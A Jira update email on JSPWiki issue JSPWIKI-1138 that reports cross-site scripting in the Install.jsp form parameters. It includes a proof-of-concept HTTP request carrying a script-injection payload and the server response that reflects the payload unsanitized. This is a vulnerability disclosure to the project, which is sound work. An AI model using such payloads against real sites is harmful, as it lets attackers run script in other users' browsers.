[jira] [Updated] (JSPWIKI-1138) Install.jsp UI overhaul

Mon, 27 Nov 2023 00:13:39 -0800 


     [ 
https://issues.apache.org/jira/browse/JSPWIKI-1138?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

ASF GitHub Bot updated JSPWIKI-1138:
------------------------------------
    Labels: pull-request-available  (was: )

> Install.jsp UI overhaul
> -----------------------
>
>                 Key: JSPWIKI-1138
>                 URL: https://issues.apache.org/jira/browse/JSPWIKI-1138
>             Project: JSPWiki
>          Issue Type: Task
>          Components: Core & storage
>    Affects Versions: 2.11.0-M8
>         Environment: Windows new version
> Firefox version 84.0.1
>  
>            Reporter: Nguyen Dang Khai
>            Priority: Major
>              Labels: pull-request-available
>         Attachments: xsswiki.PNG
>
>
> In function *install.jsp*  exist multi xss in parameter 
> *jspwiki.applicationName, jspwiki.fileSystemProvider.pageDir , 
> jspwiki.workDir*. parameter not sanitize via method  *getContentEncoding*().
>  * Request :
> {code:java}
> // POST /wiki_jsp_war/Install.jsp HTTP/1.1
> Host: localhost:8080
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 
> Firefox/84.0
> Accept: 
> text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 248
> Origin: http://localhost:8080
> Connection: close
> Referer: http://localhost:8080/wiki_jsp_war/Install.jsp
> Cookie: JSESSIONID=079AB09DC4350BB216A468B15DC9F8BA; 
> XDEBUG_SESSION=XDEBUG_ECLIPSE
> Upgrade-Insecure-Requests: 
> 1jspwiki.applicationName=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&jspwiki.fileSystemProvider.pageDir=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&jspwiki.workDir=F%3A%5C%5CExtension%5C%5Capache-tomcat-8.5.60%5C%5Ctemp&submit=Configure%21
> {code}
>  * Response:
> {code:java}
> // HTTP/1.1 200 
> Pragma: no-cache
> Expires: -1
> Cache-Control: no-cache
> Content-Type: text/html;charset=UTF-8
> Content-Language: en-US
> Date: Wed, 23 Dec 2020 10:33:46 GMT
> Connection: close
> Content-Length: 4403<?xml version="1.0" encoding="UTF-8"?>
> ...
> </div><div class="formcontainer"><form action="Install.jsp" method="post">  
> <!-- Page directory -->
>   <h3>Basics</h3>    <label class="control-label" >Application Name<input 
> class="form-control" type="text" name="jspwiki.applicationName" size="20" 
> value="'"><script>alert(1)</script>"/>
>     </label>
>     <div class="help-block">
>       What should your wiki be called?  Try to use a relative short 
> name.</div>    <label class="control-label" >Page storage<input 
> class="form-control" type="text" name="jspwiki.fileSystemProvider.pageDir" 
> size="40" value="'"><script>alert(1)</script>"/>
>     </label>
>     <div class="help-block">
>       By default, JSPWiki will use the VersioningFileProvider that stores 
> files in a directory. If you specify a directory that does not exist, JSPWiki 
> will try to create it for you. All attachments will also be put in the same 
> directory.</div>
>   <h3>Security</h3>    <label class="control-label" >Administrator 
> account</label>
>       <p>Enabled</p>
>       <div class="description">
>         This wiki has an administrator account named <strong>admin</strong> 
> that is part of the wiki group <strong>Admin</strong>. By default, JSPWiki's 
> security policy grants all members of the Admin group the all-powerful 
> <code>AllPermission</code>.</div>
>     <h3>Advanced Settings</h3>    <label class="control-label" >Work 
> directory<input class="form-control" type="text" name="jspwiki.workDir" 
> size="40" value="F:\\\\Extension\\\\apache-tomcat-8.5.60\\\\temp"/>
>     </label>
>     <div class="help-block">
>       This is the place where all caches and other runtime stuff is 
> stored.</div>
>     <p class="help-block">
>       After you click <em>Configure!</em>, the installer will write your 
> settings to 
> <code>F:\Extension\apache-tomcat-8.5.60\temp\jspwiki-custom.properties</code>.
>  It will also create an Administrator account with a random password and a 
> corresponding Admin group.</p>
>     <input class="btn btn-primary" type="submit" name="submit" 
> value="Configure!" /></form></div><hr />
>     <h3>Here is your new jspwiki-custom.properties</h3>
>        <pre>jspwiki.applicationName = '"><script>alert(1)</script>
> jspwiki.fileSystemProvider.pageDir = '"><script>alert(1)</script>
> jspwiki.workDir = F:\\\\Extension\\\\apache-tomcat-8.5.60\\\\temp
> jspwiki.basicAttachmentProvider.storageDir = '"><script>alert(1)</script>
> jspwiki.pageProvider = VersioningFileProvider
> </pre>
>    <!-- We're done... -->
> </div>
> </div>
> </div>
> </body>
> </html>
> {code}



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

Reply via email to